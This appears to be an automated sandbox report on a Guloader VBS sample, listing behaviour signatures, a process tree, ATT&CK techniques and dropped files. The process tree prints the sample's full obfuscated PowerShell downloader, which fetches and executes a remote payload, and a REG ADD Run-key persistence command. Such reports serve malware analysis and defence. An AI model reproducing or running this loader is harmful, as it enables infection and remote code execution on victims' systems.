Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 01:18

General

  • Target

    8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380.vbs

  • Size

    187KB

  • MD5

    7b1d4760615cc6bb3cc9219eb1468965

  • SHA1

    a4a57a4155fcd8351a1423134fc60df55769466d

  • SHA256

    8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380

  • SHA512

    49f9045ab51ab2aa7bbb2e76355c18616325af02d4b7a2374eb59d82a3bd9d081e773b96f8c5d78718a9e67acd9b47e8c5cc08e83a59e514b8179c0c91ddaaa1

  • SSDEEP

    3072:ImN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZl:I08GxbKja3+DCbKCvBB/WnHXC/sLJFJw

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes';If (${host}.CurrentCulture) {$Gbakkerne60++;}Function Selvforglemmelsen($Abampere){$spunky=$Abampere.Length-$Gbakkerne60;$tabelnavne='SUBsTRI';$tabelnavne+='ng';For( $Anguid=1;$Anguid -lt $spunky;$Anguid+=2){$Cubito+=$Abampere.$tabelnavne.Invoke( $Anguid, $Gbakkerne60);}$Cubito;}function Nordstenvind($Vimse){ & ($Guarantors21) ($Vimse);}$Retskredses=Selvforglemmelsen ' M,oHzNiSlKlCa /G5E.,0, ( W.iBn dAo wEsP hNST n1O0A.S0,;d W i n 6N4 ;S OxH6A4 ; Ar v :R1 2I1.. 0,)S G e.cRkeo./K2 0S1 0B0p1O0 1 .F i,rKe f o,x./T1s2B1f. 0T ';$Palletizer=Selvforglemmelsen 'MU sSe r -mASg.eMnUt ';$Vagtsommestes=Selvforglemmelsen '.h.t tOp.s.:,/O/TmWoCv iUe s mFagc k.tsaKl.kf.,c o,mO/ nAeKwIsD/ zBzOz /TRTe g l e r.nSeSs ..pmc.xS ';$Pugrees=Selvforglemmelsen 'O>A ';$Guarantors21=Selvforglemmelsen '.i eMx, ';$Miasmas='Skaldyraflejringens';$Stemmeurnernes109 = Selvforglemmelsen ' eAc h.o, ,%GaMp.pJd aAtUa %.\OD,a mHpCk oegTe nMd,e . O.v,em a& &P ae cahIo .t, ';Nordstenvind (Selvforglemmelsen 'A$BgSl oSb aDl.:MS e,cOobn d i.nNgF=V(.c m dK /.cw K$ SIt e,m.mRe uLr n.e.r n,e.s,1S0 9 )D ');Nordstenvind (Selvforglemmelsen '.$Gg l o bPaDlF:tS.n e,t.y,kAnIi nAg e,n =M$SV aFg,t sPoOmPmte sMt,e sN. sOpHlBi,tD(N$ PBuBgMr,e.eAs.)I ');Nordstenvind (Selvforglemmelsen 'T[FN.ePt .ES eUr v iUcZe P o iCn t MOa.n.a,gIeRr ]S:.: SHeFc ucr i tNy.PMrKo t o.cBoFlM =. P[ N eOt,.US eAc.upr i,tUyDPFrPo.tBo cHo.lKT y pEeE]R:D:,TLlSs 1.2K ');$Vagtsommestes=$Snetykningen[0];$nonagglutinator= (Selvforglemmelsen 'D$SgolUoUb aTlC:ZH,a bGs b uBr g e.rCe =,NJeKwM-EO,bSj e,cBt SFy sPtReUmK.SN estA.AWOeAb CUl.i ePn.t');$nonagglutinator+=$Seconding[1];Nordstenvind ($nonagglutinator);Nordstenvind (Selvforglemmelsen 'F$ HDaUb s b u rBg,e.r e..OHLe a dAePr.sN[ $EP aMlDlpeMt iEz e.r ]F=R$ R eStKsCk r.e dFsieKs ');$Daarekistelem=Selvforglemmelsen 'P$ HGaKbEsDbPu,r gde rkeS.OD oAwUnKl o,a,dWF iSlKe.( $ V.aNg.t s oCm,m eKs.tGe sN,F$CLSo nIgCwUa y sI), ';$Longways=$Seconding[0];Nordstenvind (Selvforglemmelsen 'P$bgBl.o bTa la: MPbReAl,p oJlFiCt usrFeAnF=,( T.e sItS-VP aDtGh d$SL o n gUw aAy sS)A ');while (!$Mbelpolituren) {Nordstenvind (Selvforglemmelsen 'B$HgMl o bPaSl.:.GPeonAnFeEmOp.r v eBtt=C$ t r u eG ') ;Nordstenvind $Daarekistelem;Nordstenvind (Selvforglemmelsen 'TSTtda rMtb-SSUl e eEpE F4T ');Nordstenvind (Selvforglemmelsen ',$ g l,o bEablV: MGb,e l.pCoNl.i t uFr e n = ( TGeTsLt -IPKa t h P$.LEoMn g wFa yDs,)R ') ;Nordstenvind (Selvforglemmelsen ' $ g l,oSb a lF:SS o l bAr.sMaefMt eCr sG=S$Kg.lDoCbIa lC:MAAfKs.n,i,tKt.eEn e,sS8U+F+ %,$BS,nDe,t yMk n iEn,g eHn .ScBoPu nFtA ') ;$Vagtsommestes=$Snetykningen[$Solbrsafters];}$Placentoid=334153;$Umuliggjordes143=26684;Nordstenvind (Selvforglemmelsen ' $ gSl oAbSa.l,:,RSi,c iAnse,l aSi.dNienFiSc I=, UGNeVt - C o.n t ennAtR A$.L,oSnSgRwoa,y s ');Nordstenvind (Selvforglemmelsen ' $ gPl o bHaSl.: KPrimOm eMr sPjsl e n s = B[DS y s.tGeOmU.SC.oKn v eRr,t ]L:D:SFVr o mVB,a sFeB6 4 S.tAr iCnTg (C$ RFi c.i nFe,l a,i,d.iKn iRc ). ');Nordstenvind (Selvforglemmelsen ' $ gKl o.bSaSl :RG e nVdGa r mPe rle 2,2C3 B= b[,SDy s t etmK. TSe,x.tF.GE.ndcMo d,iAnfgF]B: :HAHS C ISI . G.e t SCtmr i n gV( $MKTrDmPmUeIr s,j lSe,n sB)t ');Nordstenvind (Selvforglemmelsen 'c$Cg l o b,a lS:PW,oMrUl.dMissLhI2 5,5 =t$.GFeOn,dAa,rAm e.rPeU2K2,3 .,s u bCsRt,rUi nFg (g$HP l aScVe,n tgo.i.dN,C$JUAm.u.lti gsgsjMour dKeOs.1s4 3 )I ');Nordstenvind $Worldish255;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dampkogende.Ove && echo t"
        3⤵
          PID:2624
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes';If (${host}.CurrentCulture) {$Gbakkerne60++;}Function Selvforglemmelsen($Abampere){$spunky=$Abampere.Length-$Gbakkerne60;$tabelnavne='SUBsTRI';$tabelnavne+='ng';For( $Anguid=1;$Anguid -lt $spunky;$Anguid+=2){$Cubito+=$Abampere.$tabelnavne.Invoke( $Anguid, $Gbakkerne60);}$Cubito;}function Nordstenvind($Vimse){ & ($Guarantors21) ($Vimse);}$Retskredses=Selvforglemmelsen ' M,oHzNiSlKlCa /G5E.,0, ( W.iBn dAo wEsP hNST n1O0A.S0,;d W i n 6N4 ;S OxH6A4 ; Ar v :R1 2I1.. 0,)S G e.cRkeo./K2 0S1 0B0p1O0 1 .F i,rKe f o,x./T1s2B1f. 0T ';$Palletizer=Selvforglemmelsen 'MU sSe r -mASg.eMnUt ';$Vagtsommestes=Selvforglemmelsen '.h.t tOp.s.:,/O/TmWoCv iUe s mFagc k.tsaKl.kf.,c o,mO/ nAeKwIsD/ zBzOz /TRTe g l e r.nSeSs ..pmc.xS ';$Pugrees=Selvforglemmelsen 'O>A ';$Guarantors21=Selvforglemmelsen '.i eMx, ';$Miasmas='Skaldyraflejringens';$Stemmeurnernes109 = Selvforglemmelsen ' eAc h.o, ,%GaMp.pJd aAtUa %.\OD,a mHpCk oegTe nMd,e . O.v,em a& &P ae cahIo .t, ';Nordstenvind (Selvforglemmelsen 'A$BgSl oSb aDl.:MS e,cOobn d i.nNgF=V(.c m dK /.cw K$ SIt e,m.mRe uLr n.e.r n,e.s,1S0 9 )D ');Nordstenvind (Selvforglemmelsen '.$Gg l o bPaDlF:tS.n e,t.y,kAnIi nAg e,n =M$SV aFg,t sPoOmPmte sMt,e sN. sOpHlBi,tD(N$ PBuBgMr,e.eAs.)I ');Nordstenvind (Selvforglemmelsen 'T[FN.ePt .ES eUr v iUcZe P o iCn t MOa.n.a,gIeRr ]S:.: SHeFc ucr i tNy.PMrKo t o.cBoFlM =. P[ N eOt,.US eAc.upr i,tUyDPFrPo.tBo cHo.lKT y pEeE]R:D:,TLlSs 1.2K ');$Vagtsommestes=$Snetykningen[0];$nonagglutinator= (Selvforglemmelsen 'D$SgolUoUb aTlC:ZH,a bGs b uBr g e.rCe =,NJeKwM-EO,bSj e,cBt SFy sPtReUmK.SN estA.AWOeAb CUl.i ePn.t');$nonagglutinator+=$Seconding[1];Nordstenvind ($nonagglutinator);Nordstenvind (Selvforglemmelsen 'F$ HDaUb s b u rBg,e.r e..OHLe a dAePr.sN[ $EP aMlDlpeMt iEz e.r ]F=R$ R eStKsCk r.e dFsieKs ');$Daarekistelem=Selvforglemmelsen 'P$ HGaKbEsDbPu,r gde rkeS.OD oAwUnKl o,a,dWF iSlKe.( $ V.aNg.t s oCm,m eKs.tGe sN,F$CLSo nIgCwUa y sI), ';$Longways=$Seconding[0];Nordstenvind (Selvforglemmelsen 'P$bgBl.o bTa la: MPbReAl,p oJlFiCt usrFeAnF=,( T.e sItS-VP aDtGh d$SL o n gUw aAy sS)A ');while (!$Mbelpolituren) {Nordstenvind (Selvforglemmelsen 'B$HgMl o bPaSl.:.GPeonAnFeEmOp.r v eBtt=C$ t r u eG ') ;Nordstenvind $Daarekistelem;Nordstenvind (Selvforglemmelsen 'TSTtda rMtb-SSUl e eEpE F4T ');Nordstenvind (Selvforglemmelsen ',$ g l,o bEablV: MGb,e l.pCoNl.i t uFr e n = ( TGeTsLt -IPKa t h P$.LEoMn g wFa yDs,)R ') ;Nordstenvind (Selvforglemmelsen ' $ g l,oSb a lF:SS o l bAr.sMaefMt eCr sG=S$Kg.lDoCbIa lC:MAAfKs.n,i,tKt.eEn e,sS8U+F+ %,$BS,nDe,t yMk n iEn,g eHn .ScBoPu nFtA ') ;$Vagtsommestes=$Snetykningen[$Solbrsafters];}$Placentoid=334153;$Umuliggjordes143=26684;Nordstenvind (Selvforglemmelsen ' $ gSl oAbSa.l,:,RSi,c iAnse,l aSi.dNienFiSc I=, UGNeVt - C o.n t ennAtR A$.L,oSnSgRwoa,y s ');Nordstenvind (Selvforglemmelsen ' $ gPl o bHaSl.: KPrimOm eMr sPjsl e n s = B[DS y s.tGeOmU.SC.oKn v eRr,t ]L:D:SFVr o mVB,a sFeB6 4 S.tAr iCnTg (C$ RFi c.i nFe,l a,i,d.iKn iRc ). ');Nordstenvind (Selvforglemmelsen ' $ gKl o.bSaSl :RG e nVdGa r mPe rle 2,2C3 B= b[,SDy s t etmK. TSe,x.tF.GE.ndcMo d,iAnfgF]B: :HAHS C ISI . G.e t SCtmr i n gV( $MKTrDmPmUeIr s,j lSe,n sB)t ');Nordstenvind (Selvforglemmelsen 'c$Cg l o b,a lS:PW,oMrUl.dMissLhI2 5,5 =t$.GFeOn,dAa,rAm e.rPeU2K2,3 .,s u bCsRt,rUi nFg (g$HP l aScVe,n tgo.i.dN,C$JUAm.u.lti gsgsjMour dKeOs.1s4 3 )I ');Nordstenvind $Worldish255;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dampkogende.Ove && echo t"
            4⤵
              PID:1724
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Femcifret% -w 1 $Nonchastity=(Get-ItemProperty -Path 'HKCU:\Phonemicize\').Horsefly;%Femcifret% ($Nonchastity)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3668
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Femcifret% -w 1 $Nonchastity=(Get-ItemProperty -Path 'HKCU:\Phonemicize\').Horsefly;%Femcifret% ($Nonchastity)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4216

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5qn4kbo.k5w.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Dampkogende.Ove
        Filesize

        469KB

        MD5

        8bd368915017157ae2622d2f3275283b

        SHA1

        dac1e7dcbab2804b931bf480e29bbb709082118d

        SHA256

        ead9c28399d12285d17e0e2967f7d7473ce5e2359dc7f88605bc45fc5b92dfdd

        SHA512

        135b4b1e78738732b26900fc336d25ab1a6fdef88957ee5f3513f887d07edb1617ae4e4fa7920ae850e137720d470088ae59b3b8faa1407cfc213bf6160c285c

      • memory/1472-10-0x0000015369C60000-0x0000015369C82000-memory.dmp
        Filesize

        136KB

      • memory/1472-15-0x00007FF8B0970000-0x00007FF8B1431000-memory.dmp
        Filesize

        10.8MB

      • memory/1472-16-0x00007FF8B0970000-0x00007FF8B1431000-memory.dmp
        Filesize

        10.8MB

      • memory/1472-4-0x00007FF8B0973000-0x00007FF8B0975000-memory.dmp
        Filesize

        8KB

      • memory/1472-52-0x00007FF8B0970000-0x00007FF8B1431000-memory.dmp
        Filesize

        10.8MB

      • memory/1472-45-0x00007FF8B0970000-0x00007FF8B1431000-memory.dmp
        Filesize

        10.8MB

      • memory/1472-43-0x00007FF8B0973000-0x00007FF8B0975000-memory.dmp
        Filesize

        8KB

      • memory/2912-49-0x0000000001660000-0x00000000049A0000-memory.dmp
        Filesize

        51.2MB

      • memory/4476-20-0x00000000056D0000-0x0000000005CF8000-memory.dmp
        Filesize

        6.2MB

      • memory/4476-40-0x00000000089A0000-0x0000000008F44000-memory.dmp
        Filesize

        5.6MB

      • memory/4476-35-0x00000000065B0000-0x00000000065FC000-memory.dmp
        Filesize

        304KB

      • memory/4476-36-0x0000000007D70000-0x00000000083EA000-memory.dmp
        Filesize

        6.5MB

      • memory/4476-37-0x0000000006AA0000-0x0000000006ABA000-memory.dmp
        Filesize

        104KB

      • memory/4476-38-0x00000000077E0000-0x0000000007876000-memory.dmp
        Filesize

        600KB

      • memory/4476-39-0x0000000007770000-0x0000000007792000-memory.dmp
        Filesize

        136KB

      • memory/4476-34-0x0000000006510000-0x000000000652E000-memory.dmp
        Filesize

        120KB

      • memory/4476-33-0x0000000005F10000-0x0000000006264000-memory.dmp
        Filesize

        3.3MB

      • memory/4476-42-0x0000000008F50000-0x000000000C290000-memory.dmp
        Filesize

        51.2MB

      • memory/4476-23-0x0000000005EA0000-0x0000000005F06000-memory.dmp
        Filesize

        408KB

      • memory/4476-22-0x0000000005E30000-0x0000000005E96000-memory.dmp
        Filesize

        408KB

      • memory/4476-21-0x0000000005680000-0x00000000056A2000-memory.dmp
        Filesize

        136KB

      • memory/4476-19-0x0000000004F00000-0x0000000004F36000-memory.dmp
        Filesize

        216KB